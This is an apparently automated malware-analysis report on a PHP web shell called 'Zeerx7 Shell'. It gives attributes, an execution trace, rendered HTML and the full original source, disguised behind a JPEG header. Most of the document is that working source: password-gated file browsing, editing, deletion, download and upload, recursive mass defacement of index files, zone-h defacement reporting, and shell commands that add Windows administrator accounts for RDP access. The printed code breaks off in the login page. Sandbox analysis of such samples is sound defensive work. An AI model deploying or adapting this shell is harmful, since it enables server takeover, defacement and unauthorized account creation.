PHP Malware Analysis
bypassyyh.php
md5: 89e727d4d91f6c5703ddc98bbe041507
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Original, Traces)
- getcwd (Original)
- php_uname (Original)
- set_time_limit (Original, Traces)
Execution
- shell_exec (Original)
Files
Input
Title
- { Zeerx7 Shell } (HTML)
URLs
- http://www.zone-h.com/notify/single (Original)
- http://www.zone-h.org/archive/notifier=$nick (Original)
- http://www.zone-h.org/archive/notifier=$nick/published=0 (Original)
- http://zone-xsec.com/ (Original)
- https://github.com/404rgr/zeerx7 (Original)
- https://i.ibb.co/hgKSY0K/cooltext317065123408510.png (Original)
- https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css (Original)
Deobfuscated PHP code
Failed to deobfuscate codeExecution traces
data/traces/89e727d4d91f6c5703ddc98bbe041507_trace-1676251461.1843.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:24:47.082097]
1 0 1 0.000151 393528
1 3 0 0.001016 576976 {main} 1 /var/www/html/uploads/bypassyyh.php 0 0
2 4 0 0.001035 576976 session_start 0 /var/www/html/uploads/bypassyyh.php 21 0
2 4 1 0.001091 577728
2 4 R TRUE
2 5 0 0.001109 577728 error_reporting 0 /var/www/html/uploads/bypassyyh.php 22 1 0
2 5 1 0.001123 577768
2 5 R 22527
2 6 0 0.001137 577728 set_time_limit 0 /var/www/html/uploads/bypassyyh.php 23 1 0
2 6 1 0.001152 577792
2 6 R FALSE
2 7 0 0.001165 577760 clearstatcache 0 /var/www/html/uploads/bypassyyh.php 24 0
2 7 1 0.001177 577760
2 7 R NULL
2 8 0 0.001190 577760 ini_set 0 /var/www/html/uploads/bypassyyh.php 25 2 'error_log' NULL
2 8 1 0.001206 577832
2 8 R ''
2 9 0 0.001219 577760 ini_set 0 /var/www/html/uploads/bypassyyh.php 26 2 'log_errors' 0
2 9 1 0.001233 577832
2 9 R '1'
2 10 0 0.001245 577760 ini_set 0 /var/www/html/uploads/bypassyyh.php 27 2 'max_execution_time' 0
2 10 1 0.001259 577800
2 10 R '0'
2 11 0 0.001272 577728 ini_set 0 /var/www/html/uploads/bypassyyh.php 28 2 'output_buffering' 0
2 11 1 0.001286 577800
2 11 R FALSE
2 12 0 0.001299 577728 ini_set 0 /var/www/html/uploads/bypassyyh.php 29 2 'display_errors' 0
2 12 1 0.001313 577800
2 12 R ''
1 A /var/www/html/uploads/bypassyyh.php 30 $MyPass = 'hellofucking'
2 13 0 0.001342 577728 pausi_login 1 /var/www/html/uploads/bypassyyh.php 51 0
3 14 0 0.001360 577864 session_start 0 /var/www/html/uploads/bypassyyh.php 692 0
3 14 1 0.001377 577864
3 14 R TRUE
0.001409 498440
TRACE END [2023-02-12 23:24:47.083388]
Generated HTML code
<html><head></head><body>����JFIF���
( % !1!%)+.0. 383-7(-.+ <title>{ Zeerx7 Shell }</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style type="text/css">
body {
background: black;
color: #00FF00;
}
input{
border:0;
border:1px solid #900;
background:black;
color: gold;
}
</style><center><br><br>
<pre>+----------------------------------------------------------------------------------------------------+
|ooo==oo====+==...:::::~.:::+++:=::~~~:oo=:o==ooooooo+.~oooo===oo=o==oooo=ooo=o===:+o===ooo==+==o=o=o|
|=o+ +o=.~o= :~..~++~~~..~=+++++:~~=o +oo :ooooooooo=.~~oooooooo+====oooooooo=o=o+:=o==o==o=o=o====oo|
|+=..=o: +o= +.~~:==.~..~::~~++++++=: +=. +o=:+=o::o~.~::=+:+o+:+o==oooo=o=o=o===++==oo======++++=ooo|
|o= ~+: =o..: . :~ + ~=+ ~~:+:+o=~ :=: ==:.: +.~++. ..:...=: ..:+oooooooooo=o==+:=oo+======oooooooo|
|oo~.~.:.::.~~ ~... ..........+=+==.~oo+ ::..:.~.~+:.~~.:..::.~=:~++===+==oo=oo=o++oo========+++ooooo|
|ooo++oo=++::::::~~~::==::~::+o===++====+++==oo=o==ooooooo+==+:~:+++++++===========o=+=======oooooo++|
|===oooooo=+::~~~~~+:oo==+=oooooo========+=o=oo===ooooooooo=+.~:+=++=====++++==+=====ooo=====+=oooooo|
|=======ooooo+:==:+o==oooo=:+=+=====o===++=o=oo++++++=====+:~:::+:++++=+++======+=+===+=======ooo=+=o|
|oo===+++==o=~:==o=oo===o===+===+++=======ooooo====+=+++:~~~::~~::::~:::::::::::+::+=+++====+oooooo++|
|oo=oooo=++++:~~+::+===o=oooo=====o=ooooo==ooooooooooo=:~~..~..~~~~~.~~~~~~~~:~~~~~::++:+++=ooo==oooo|
|o==oooo+:++:::++++++++++=o=ooo=o==ooooo=:++===ooooo==:~.......~..................~~::~:+++=oooo=+=oo|
|==ooo=+++::~+ooo==+===+++:+:+=oooooo=o=:+==+:+++=o==:.......~~:::~~~~.....~.......~~~~:::++oo=ooo=++|
|=ooo=:::::~+===oo=o======++++:+==ooooo==o==oo==+++++:~...~:+===+=+++++:~.~~~~~~~~~..~~:~+::+===+=ooo|
|ooo=:::::::==:+=====o=o=====++=======oooo==o==ooo==~~~..+======ooooo===++~.~~~:::~~:~~~~:~:::=o=++=o|
|oo=::++~:+==+++=o=+=oo===oo=oo==++++======oooooooo=....++:++=oo=oooooooooo=++::~.::~~~~~~~~:+==oo=++|
|=+++++~+=o====oo===oo==o====oo===o===++=+=====oooo:..:+=+=+:~:=oooooooooooooo===+:~::~~~~:++=+++=oo=|
|=++++++======ooo=oo==+=======+==oooooo==+=+==+==o=~.:==oooooo=:+ooooooooooooo=o===+::~~::++==o=++=oo|
|oooo====+=o=ooo==oo==ooo+o=+++=ooooooooooooo===+=:.+=+===ooooo=.:oooooooooooooo===+:::::++=+++==oooo|
|o==ooo==+o=ooo==oo=+ooo=oo==+=oooo=o=oooooooo=o=+~+==o=+++::====oooo=:~...:::+====++::::+==++::ooooo|
|+:::+:+++=ooo==oo+=ooo=ooo===oo=oo=o===ooooo==oo=+====oo==+:++oooooo++++====++::+++::::=ooooo+oooooo|
|~+===+=======ooo==ooo==ooo==ooo====ooo=ooooo=oooo==++==ooooo=oooooo==oooooooooo+++:~:+ooo=oooooooooo|
|:+==oo==oo=+==o==oo==ooo===ooooo==oooooooo==oooo=+=+==ooooo=oooooo====+::=oooo=++~~+oooo======oooooo|
|~::::==ooooo=o==========+=ooooo===ooooooo==oooo=+==:====o=oooooo=====o=++++===++~:=oooo=======o=o===|
|++::~:::++ooo==oo===oooooooooooooooooooo==ooooo=+==.oo=oo=oooooo==+==ooooo===++~:=oooo:~::==o=====o=|
|o==++:+~::::+=ooooooo=oooooooooooooooooo+ooooo==+=o~~=oooooooooo=====ooooo==+:+===ooo+:+~~=oooo=====|
|=oooo====+::~::++==oo=o====ooooooooooo==oooo======o=+:::+:~~+++=++=+=oo===+=:+ooooooo==:~=oooooooooo|
|:++==ooo=o==++:::::+======oo==ooooooo=====o==+=o=+o=oo=:~:+o: ~=oooooo=+++::+=+=o=oooooooo=o==o=oooo|
|:::::+=+o=o=====:::=o============+===oo====o==========oooooo=:..:++++:~:+++=o==o===+===ooooo==oooooo|
|++:+::::+:==o=o======ooo=+o==oooooooooo=ooooooo=++====o=:+==oo==+::::++++=oo=+=======++++ooooooooooo|
|oooo+=++:::::++=o=oooo==ooooooooooooooooooooo=======ooo+ .==o=====++:+=====+=======o==o=+==oooooo=+|
|oooooooo==::~:~:==oo===oooooooooooooooooooooo======ooo+ ~=oo==+++:++=ooooo+=o==o=======+=======oo==|
|oooooooooo+::::=ooo===ooooooooooooooooooooooo=+=====oo .=o==++++++==ooooo+=oooo=+o============+==oo|
|===o======::::=ooo====ooooooooooooooooooo=ooooo=======.~===+===+==+===oo=+=ooooo=o=..~:+======+oo=o=|
|oo========++:=oooo===ooooooooooooooooooooooooooo=+++=+=+++++++=++++++=oo=+=o=oo=o+ ..~:+===o=+=o==oo|
|oooo==++==o=+==oooo==oooooooooooooooooooooooooooo===+:::++++++++++==oooooo==oo=o=..~:::=oooo+oo++==+|
|oooooooo==++=+=ooo=+ooooooooooooooooooooooooooooooooo====+=++===oooooooooooo===o+.~:::==ooo+oo~..~++|
|o=oooooooo==++oo=o==oooooooooooooooooooooooooo=oooooooo==o=oooooooooooooooooooo=+::+:=o=oo+oo~.~~:+=|
|==oooooo=oooo==oo===ooooooooooooooooooooooooooooooo=ooooooooo=ooooo=ooooooooooooo=+++oooo==o:.~~:=o=|
|=ooooooooooo=o=o=o==oooooooooooooooooooo=ooooooooo=oo=o=oo=o=oo=o=oooooooooooooooooo=ooo+=o+:~~:+ooo|
|=ooooooooooo==ooo==+ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo+=oo=++:+oooo|
|ooooooooooo==oo====+oooooooooooooooooooooooooo=ooo=ooo=o=ooooooo=ooooooooooooooooooooooo=oo=o=+ooo=o|
|ooooooooooooo==oo==ooooooooooooooooooooooooooooooooooooooo=oooooooooo=ooooooooooooooooooo==+=+=oo===|
|ooooooooo=o=o=o====ooooooooooooooooooooooooooooooooo=oooooooo==o=ooo=oooooooooooooooooooooo=+===oo==|
|oooooooo==ooooo====oooooooooooooooooooooooooooooooooooooooooooooooo=oooooooooooooooooooo=oooo=+++=oo|
|ooooooo=o=o=oo====oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo=ooooooo===+=o|
|oooooooo=ooo=oo=+oooooooooooooooooo=====ooooooooooooooooooooooooo==ooo=oooooooooooo==oo==ooooo+=====|
|oooo===oo=oooo=+=oooooooooooooo==++==+=++++oooooooooooooooooooooooooooo=oooooooooo=o===o=ooooo=+=+==|
|oooo=o=ooo=o====ooooooooo=oooo++=++++++++==+ooooooooooooooooooo==oooooooooooooooo====oo=o=oooo=====+|
|ooooo=o=ooo===+oooooooo===++::==++=+++=+==+=+=====+===oooooooooooooooo=oooooooo=======o==oooooo=====|
|o=+=+======+++====o===+++++++++:++::++:::++++~:::++++:~+=o===========+===o===o=:++++=+++====oo=+++=+|
+----------------------------------------------------------------------------------------------------+
</pre>
<form method="POST">
<input type="password" name="pw">
</form>
</center></body></html>Original PHP code
����JFIF�����������
( % !1!%)+.0. 383-7(-.+<?php
/*
^ Name : Zeerx7 Shell
^ Author: Zeerx7(Pausi)
^ Team: XploitSec-ID
^ Version : V.1
^ https://github.com/404rgr/zeerx7
* Ingin Record? izin dulu gan
* gak izin? Sfx lo nob bab!
! Note:
'tidak semua tools disini saya yang buat!!'
'untuk tools akan ditambah di versi selanjutnya'
/^
Pass Default : z7
^/
*/
session_start();
error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$MyPass = 'hellofucking'; // Password Default: z7
function dup($pass,$n){
if($_GET['pass'] == $pass){
$f = __FILE__;
$d = __DIR__;
echo $d.'/'.$n;
$pausi = fread(fopen($f,'r'),filesize($f));
if(fwrite(fopen($d.'/'.$n,'w'),$pausi)){
echo ' [Success]';
}else{
echo ' [failed]';
}
}else{
echo 'Error [PASSWORD]';
}
exit;
}
if($_GET['dup'] == 'true' and !empty($_GET['filename'])){
dup($MyPass,$_GET['filename']);
}
if (empty($_SESSION['login'])) {
pausi_login();
}
if (isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['action'] == 'download')) {
@ob_clean();
$file = $_GET['file'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
echo "
<!DOCTYPE html>
<html>
<head>
<title>{ Zeerx7 Shell }</title>
<link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css' />
<style type='text/css'>
body{
font-family: 'Source Sans Pro';
background: black;
margin 0;
color: white;
}.pausi{
margin: 0 auto;
width: 100%;
}
table {
margin: auto;
font-family: \"Lucida Sans Unicode\", \"Lucida Grande\", \"Segoe Ui\";
font-size: 15px;
width: 100%;
}th{
background-color: #302F2F;
}td{border-bottom: 1px dashed #00008B;
background-color: black;
padding: 90 11px;
}.t{
text-align: center;
}tr:hover td{
background-color: red;
}.center{
text-align: center;
}.box{
min-width:50%;
border-radius:8px;
opacity:1;
padding: 10px;
box-shadow:1px 1px 25px red;
opacity:0.98;
}.menu{
border:1px solid red;
background-color:black;
text-align: center;
width:80px;
padding: 5px;
color:white;
}a{
font-family: 'arial';
color: white;
text-decoration: none;
margin: 0;
}a:hover{
color: gold;
}.u{float:right;text-align:right;margin-bottom:1.5em}input[type=file]{display:none}input[type=submit]{border:1px solid #181818;padding:.2em;}
</style>
</head>
<body>";
if (empty($_GET['dir'])) {
$dir = getcwd();
} else {
$dir = $_GET['dir'];
chdir($dir);
}
function pausipath()
{
global $dir;
$path = str_replace('\\', '/', $dir);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo '<a href="?dir=/">/</a>';
continue;
}
if ($pat == '')
continue;
echo '<a href="?dir=';
for ($i = 0; $i <= $id; $i++) {
echo "$paths[$i]";
if ($i != $id)
echo "/";
}
echo '">' . $pat . '</a>/';
}
}
function ip_info()
{
$ip2 = getHostByName(getHostName());
$p = "Server IP: " . $ip2 . " | Your IP: " . $_SERVER['REMOTE_ADDR'];
return $p;
}
$verPHP = phpversion();
$IP = getHostByName(getHostName());
$localhost = shell_exec(hostname);
$soft = $_SERVER['SERVER_SOFTWARE'];
$mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
$mail = (function_exists('mail')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
echo "<center><font size='6px' color='lavender'>^_^ Zeerx7 Shell *_*</font><br></center>
<div class='pausi'>
<p>" . php_uname() . "<br>" . ip_info() . "<br>
$soft <br>
MySQL: $mysql | cURL: $curl | MAILER: $mail<br>";
pausipath();
echo ' [ ';
if (is_writable($dir))
echo '<font color="#00ff00">';
elseif (!is_readable($dir))
echo '<font color="red">';
echo perms($dir) . '</font> ]';
echo "
</p><br>
<center><form method='post' enctype='multipart/form-data' action='?upload=true&dir=$dir'>
<a class='menu' href='?'>Home</a>
<label class='menu'>
<input type='file' name='pausi_upload[]' onchange='this.form.submit()' multiple> UPLOAD
</label>
<a class='menu' href='?tools=jumping'>Jumping</a>
<a class='menu' href='?tools=mass_deface&dir=$dir'>Mass Deface</a>
<a class='menu' href='?tools=crack_cpanel'>Crack Cpanel</a>
<a class='menu' href='?tools=RDP'>Create RDP</a>
<a class='menu' href='?tools=zone-h'>Zone-H</a>
<a class='menu' href='?logout=true'>EXIT</a>
</form>
</center>
<br>";
if ($_GET['logout'] == 'true') {
session_start();
session_destroy();
header('location: ?');
echo " <meta http-equiv=\"refresh\" content=\"0; url=?\"> ";
} elseif ($_GET['action']) {
if ($_GET['action'] == 'rename') {
echo "<hr>";
$re = $_GET['rename'];
echo "
<form action='?action=rename&rename=$re&dir=$dir' method=POST>
New Name : <input type='text' name='fname'>
<input type='submit' name='fok' value='Done'>
</form>";
if (isset($_POST['fok'])) {
$new = $_POST['fname'];
if (rename($re, "$dir/$new")) {
echo "<center>Rename Successfully<center>";
} else {
echo "<center>Rename Failed<center><center>";
}
}
} elseif ($_GET['action'] == 'edit') {
$save = $_GET['edit'];
echo "<hr>edit=> $save<br><hr>";
if (!empty($_POST['pausiganteng'])) {
$up = fopen($save, "w");
$res = fwrite($up, $_POST['pausi_ganteng']);
if ($res) {
echo "<h3 class=center style='color:green'>Edit Successfully</h3>";
} else {
echo "<h4 class=center style='color:red'>Failed!!</h4>";
}
}
$cont = htmlspecialchars(file_get_contents($save));
echo "<form action='?action=edit&edit=$save&$dir=$dir' method='POST'>
<center><textarea name='pausi_ganteng' cols=100% rows=30%>$cont</textarea><br><br>
<input type='submit' name='pausiganteng' value='<<<<<<<<[! Save File !]>>>>>>>>'></center>
</form><br><br>";
} elseif ($_GET['action'] == 'view') {
echo "<hr>";
echo "View Files=> " . $_GET['view'] . "<br>";
$cont = htmlspecialchars(file_get_contents($_GET['view']));
echo "<pre style='background-color: grey'>$cont</pre>";
} elseif ($_GET['action'] == 'delete-file') {
if (unlink($_GET['delete'])) {
$del_pausi = "<h3 class=center style=color:#00ff00>Delete Successfully</h3>";
} else {
$del_pausi = "<h3 class=center style=color:red>Delete Failed</h3>";
}
pausi_tampilkan();
} elseif ($_GET['action'] == 'delete-dir') {
$del = delTree($_GET['delete-dir']);
if ($del) {
$del_pausi = "<h3 class=center style=color:#00ff00>Delete Successfully</h3>";
} else {
$del_pausi = "<h3 class=center style=color:red>Delete Failed</h3>";
}
pausi_tampilkan();
} elseif ($_GET['action'] == 'create_file') {
echo ('<hr>');
if ($_POST['new_file'] and $_POST['pausi_create_file']) {
$n = $_POST['new_file'];
$isi = $_POST['pausi_create_file'];
$b = @fopen($n, "w");
$sep = @fwrite($b, $isi);
if ($sep) {
echo "<h3 class=center style=color:#00ff00>Create $n Successfully</h3>";
} else {
echo "<h3 class=center style=color:red>Create $n Failed</h3>";
}
echo "<br>";
}
echo "<form method=POST>
<h3>New File: <input type=text name=new_file placeholder=\"Nama File\"><br>
<h3>Isi File: </h3><textarea name=pausi_create_file cols=100% rows=30% placeholder=\"Isi File\"></textarea></h3><br>
<button type=submit>Create</button>
</form>";
} elseif ($_GET['action'] == 'new-dir') {
echo ('<hr>');
if ($_POST['new_dr']) {
$sep = @mkdir($_POST['new_dr']);
if ($sep) {
echo "<h3 class=center style=color:#00ff00>Create $n Successfully</h3>";
} else {
echo "<h3 class=center style=color:red>Create $n Failed</h3>";
}
echo "<br>";
}
echo "<form method=POST>
<h3>New Folder: <input type=text name=new_dr placeholder=\"Nama Folder\">
<button type=submit>Create</button>
</form>";
}
} elseif ($_GET['tools']) {
if ($_GET['tools'] == 'jumping') {
echo "<hr>";
aksiJump($dir, $IP);
} elseif ($_GET['tools'] == 'mass_deface') {
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_deface($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif ($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
echo "<a href='?'><- back to home</a>";
} else {
echo "<hr>
<form method='post'>
<font style='text-decoration: underline;'>Tipe:</font>
<input type='radio' name='tipe' value='biasa' checked>Biasa<input type='radio' name='tipe' value='massal'>Massal<br><br>
<font style='text-decoration: underline;'>Dir:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br><br>
<font style='text-decoration: underline;'>Index File:</font><br>
<textarea name='script' style='width: 450px; height: 200px;'>0wNeD By Zeerx7</textarea><br>
<input type='submit' name='start' value='Goo!' style='width: 454px;' class='btn btn-success btn-sm'><br><br>
</form>";
}
} elseif ($_GET['tools'] == 'crack_cpanel') {
crack_cpanel();
} elseif ($_GET['tools'] == 'zone-h') {
echo "<hr>";
if ($_POST['submit']) {
$domain = explode("\r\n", $_POST['url']);
$nick = $_POST['nick'];
echo "<font color='white'>Defacer Onhold:</font> <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
echo "<font color='white'>Defacer Archive:</font> <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
function zoneh($url, $nick)
{
$ch = curl_init("http://www.zone-h.com/notify/single");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
return curl_exec($ch);
curl_close($ch);
}
foreach ($domain as $url) {
$zoneh = zoneh($url, $nick);
if (preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
echo "<font color='white'>$url -> </font><font color=green>OK</font><br>";
} else {
echo "<font color='white'>$url -> </font><font color=red>ERROR</font><br>";
}
}
} else {
echo "<center>
<font size='7' color='red' face='Orbitron'>Zone-H Mass Notify</font><br>";
echo "<br>
<form method='post'>
<input style='width: 350px;' type='text' name='nick' placeholder='Defacer' value=Zeerx7><br><br>
<textarea style='width: 350px;' placeholder='http://zone-xsec.com/' name='url'></textarea><br><br><input class='tombol' type='submit' name='submit' value='Submit'>
</form>";
}
} elseif ($_GET['tools'] == 'RDP') {
echo "<hr>
<div style='padding: 2em;'>
<form method=POST>
<label>CREATE RDP </label><br>
<label>Username: </label>
<input type=text style='border:1px solid #590;' name=user>
<label> Password: </label>
<input type=text style='border:1px solid #590;' name=pass>
<input type='SUBMIT' name=create_rdp VALUE='CREATE'>
</form>
<br><br><br>
<form method=POST>
<label>OPTION </label><br>
<label>Username: </label>
<input type=text style='border:1px solid #590;' name=user>
<label> Password: </label>
<input type=text style='border:1px solid #590;' name=pass>
<label> Action: </label>
<select name='action'>
<option value='1'>Tampilkan Username</option>
<option value='2'>Hapus Username</option>
<option value='3'>Ubah Password</option>
</select>
<input type='SUBMIT' value='GO!' name='option'>
</form>
</div>
";
$inf = "<p>--------------{ INFORMATION }--------------</p>";
if ($_POST['create_rdp']) {
print $inf;
$user = $_POST['user'];
$pass = $_POST['pass'];
$cek = shell_exec("net user");
if (preg_match("/$user/", $cek)) {
echo $localhost . $user . " sudah ada<br>";
} else {
$cmd_add_user = shell_exec("net user " . $user . " " . $pass . " /add");
$cmd_add_groups1 = shell_exec("net localgroup Administrators " . $user . " /add");
$cmd_add_groups2 = shell_exec("net localgroup Administrator " . $user . " /add");
$cmd_add_groups3 = shell_exec("net localgroup Administrateur " . $user . " /add");
if ($cmd_add_user) {
echo "# [add user]-> " . $user . " <font color='greenyellow'>Berhasil</font><br>";
} else {
echo "# [add user]-> " . $user . " <font color='red'>Gagal</font><br>";
}
if ($cmd_add_groups1) {
echo "# [add localgroup Administrators]-> " . $user . " <font color='greenyellow'>Berhasil</font><br>";
} else if ($cmd_add_groups2) {
echo "# [add localgroup Administrator]-> " . $user . " <font color='greenyellow'>Berhasil</font><br>";
} else if ($cmd_add_groups3) {
echo "# [add localgroup Administrateur]-> " . $user . " <font color='greenyellow'>Berhasil</font><br>";
} else {
echo "# [add localgroup]-> " . $user . " <font color='red'>Gagal</font><br>";
}
echo "# [INFO PC]-> RDP IP " . $_SERVER["HTTP_HOST"] . " Username : " . $user . " Password : " . $pass . " <font color='greenyellow'>Berhasil</font><br>";
}
} elseif ($_POST['option']) {
print $inf;
if ($_POST['action'] == "1") {
echo "<pre>" . shell_exec("net user") . "</pre>";
} else if ($_POST['action'] == "2") {
$username = $_POST['user'];
$cmd_cek_user = shell_exec("net user");
if (!empty($username)) {
if (preg_match("/$username/", $cmd_cek_user)) {
$cmd_add_user = shell_exec("net user " . $username . " /DELETE");
if ($cmd_add_user) {
echo "# [remove user]-> " . $username . " <font color='greenyellow'>Berhasil</font><br>";
} else {
echo "# [remove user]-> " . $username . " <font color='red'>gagal</font><br>";
}
} else {
echo "# [remove user]-> " . $username . " <font color='red'>Tidak ditemukan</font><br>";
}
} else {
echo "# [PESAN]-> <font color='red'>Kamu lupa masukin Username yang akan di delete</font><br>";
}
} else if ($_POST['action'] == "3") {
$username = $_POST['user'];
$password = $_POST['pass'];
$cmd_cek_user = shell_exec("net user");
if (!empty($username)) {
if (preg_match("/$username/", $cmd_cek_user)) {
$cmd_add_user = shell_exec("net user " . $username . " shor7cut");
if ($cmd_add_user) {
echo "# [change password]-> (" . $username . "|" . $password . ") <font color='greenyellow'>Berhasil</font><br>";
} else {
echo "# [change password]-> (" . $username . "|" . $password . ") <font color='red'>GAGAL</font><br>";
}
} else {
echo "# [PESAN]-> <font color='red'>Username Tidak Ditemukan di server</font><br>";
}
} else {
echo "# [PESAN]-> <font color='red'>Kamu lupa masukin Username yang akan di delete</font><br>";
}
}
}
}
} elseif ($_GET['upload'] == 'true') {
if (isset($_FILES['pausi_upload'])) {
foreach ($_FILES['pausi_upload']['name'] as $key => $val) {
$name = $_FILES['pausi_upload']['name'][$key];
$tmp = $_FILES['pausi_upload']['tmp_name'][$key];
if (trim($name) != '') {
if (move_uploaded_file($tmp, $name)) {
$del_pausi = '<h3 class=center style=color:#00ff00>Uploaded ' . $name . ' Successfully</h3><br/>';
} else {
$del_pausi = "<h3 class=center style=color:red>Failed to Upload " . $name . "</h3><br>";
}
}
}
}
pausi_tampilkan();
} else {
pausi_tampilkan();
}
echo "
</div>
</body>
</html>";
function mass_deface($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=#00ff00>DONE</font>] $lokasi<br>";
file_put_contents($lokasi, $isi_script);
$idx = mass_deface($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=#00ff00>DONE</font>] $dirb/$namafile<br>";
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
function delTree($dir)
{
$files = array_diff(scandir($dir), array(
'.',
'..'
));
foreach ($files as $file) {
(is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file");
}
return rmdir($dir);
}
function pausi_tampilkan()
{
global $dir;
global $del_pausi;
echo "<div class=\"box\">
$del_pausi
<table>
<th style=\"width: 35%\">Name</th>
<th>Size</th>
<th>Modified</th>
<th>Permission</th>
<th style=\"width: 30%\">Action</th>
";
$si = scandir($dir);
foreach ($si as $fol) {
$waktu = date("D-m-Y G:i", filemtime("$dir/$fol"));
$pausi_perms = perms($dir . "/" . $fol);
if ($fol == ".") {
continue;
} elseif ($fol == "..") {
print "<tr>
<td><i class='fa fa-folder-open-o'></i> <a href='?dir=$dir/$fol/'>$fol</a></td>
<td><center>--</cemter></td>
<td class=center>" . $waktu . "</td>
<td class=center>";
if (is_writable($dir . '/' . $file))
echo '<font color="#00ff00">';
elseif (!is_readable($dir . '/' . $file))
echo '<font color="red">';
print $pausi_perms . "</td>
<td class=center><a href='?action=create_file&dir=$dir'>New File</a> | <a href='?action=new-dir&dir=$dir'>New Folder</td>
<tr>";
} else {
if (is_dir("$dir/$fol") == true) {
print "<tr>
<td><i class='fa fa-folder-o'></i> <a href='?dir=$dir/$fol/'>$fol</a></td>
<td class=center>--</td>
<td class=center>" . $waktu . "</td>
<td class=center>";
if (is_writable($dir . '/' . $file))
echo '<font color="#00ff00">';
elseif (!is_readable($dir . '/' . $file))
echo '<font color="red">';
print $pausi_perms . "</td>
<td><a href='?action=delete-dir&delete-dir=$dir/$fol&dir=$dir'>
<center>Delete</a> | <a href='?action=rename&rename=$dir/$fol&dir=$dir'>Rename</a></center></td>
<tr>";
}
}
}
foreach ($si as $file) {
$waktu = date("D-m-Y G:i", filemtime("$dir/$file"));
$pausi_perms = perms($dir . "/" . $file);
if ($file == "." || $file == "..") {
continue;
} else {
$size = filesize("$dir/$file") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size = $size . ' KB';
}
if (is_file("$dir/$file") == true) {
print "<tr>
<td><a href='?action=view&view=$dir/$file&dir=$dir'><i class='fa fa-file-o'></i> $file</a></td>
<td>$size</td>
<td class=center>$waktu</td>
<td class=center>";
if (is_writable($dir . '/' . $file))
echo '<font color="#00ff00">';
elseif (!is_readable($dir . '/' . $file))
echo '<font color="red">';
echo "$pausi_perms</td>
<td class=center><a href='?action=edit&edit=$dir/$file&$dir=$dir'>Edit</a> | <a href='?action=delete-file&delete=$dir/$file&dir=$dir'>Delete</a> | <a href='?action=rename&rename=$dir/$file&dir=$dir'>Rename</a> | <a href='?action=download&file=$dir/$file'>Download</a></td>
</tr>";
}
}
}
echo "</div>";
}
function pausi_login()
{
global $MyPass;
echo " <title>{ Zeerx7 Shell }</title>
<meta name='viewport' content='width=device-width, initial-scale=1'>
<style type='text/css'>
body {
background: black;
color: #00FF00;
}
input{
border:0;
border:1px solid #900;
background:black;
color: gold;
}
</style><center><br><br>
<pre>
+----------------------------------------------------------------------------------------------------+
|ooo==oo====+==...:::::~.:::+++:=::~~~:oo=:o==ooooooo+.~oooo===oo=o==oooo=ooo=o===:+o===ooo==+==o=o=o|
|=o+ +o=.~o= :~..~++~~~..~=+++++:~~=o +oo :ooooooooo=.~~oooooooo+====oooooooo=o=o+:=o==o==o=o=o====oo|
|+=..=o: +o= +.~~:==.~..~::~~++++++=: +=. +o=:+=o::o~.~::=+:+o+:+o==oooo=o=o=o===++==oo======++++=ooo|
